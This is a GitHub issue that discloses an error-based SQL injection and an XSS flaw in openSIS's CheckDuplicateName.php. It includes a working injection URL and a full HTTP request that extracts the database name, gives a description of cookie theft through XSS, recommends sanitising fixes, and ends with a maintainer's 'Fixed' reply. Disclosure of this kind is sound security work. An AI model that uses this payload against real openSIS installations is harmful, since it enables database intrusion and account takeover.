Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS and Error based SQL injection in CheckDuplicateName.php #198

Closed
CP04042K opened this issue Sep 5, 2021 · 4 comments
Closed

XSS and Error based SQL injection in CheckDuplicateName.php #198

CP04042K opened this issue Sep 5, 2021 · 4 comments

Comments

@CP04042K
Copy link

CP04042K commented Sep 5, 2021

Description

Due to lack of protection, parameters table_name, field_name, id, field_id can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter msg can be used to inject XSS payload and steal user's cookie (and even takeover user's account)
Screenshot from 2021-09-05 14-45-56(1)

As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities.

Exploiting

Screenshot from 2021-09-05 14-51-24

Injection point:
HTTP://demo/CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg=

In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in field_name, msg.

Request:

GET /CheckDuplicateName.php?table_name=api_info+where+id=1+and+extractvalue(0x0a,concat(0x0a,(select+database())))--&field_name=&val=&field_id=&msg= HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Sun, 05 Sep 2021 07:59:18 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 716
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/htmlx

Solution

Add security functions such as sqlSecurityFilter to sanitize parameters before processing or printing out to the screen. For XSS, use htmlentities to properly encode the output.

@openSISAdmin
Copy link
Member

Fixed

@VHAE04
Copy link

VHAE04 commented Mar 3, 2022

nice

@Lebaominu
Copy link

Giỏi quá a 🏆🏆

@kimstars
Copy link

kimstars commented Mar 5, 2022

nice

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants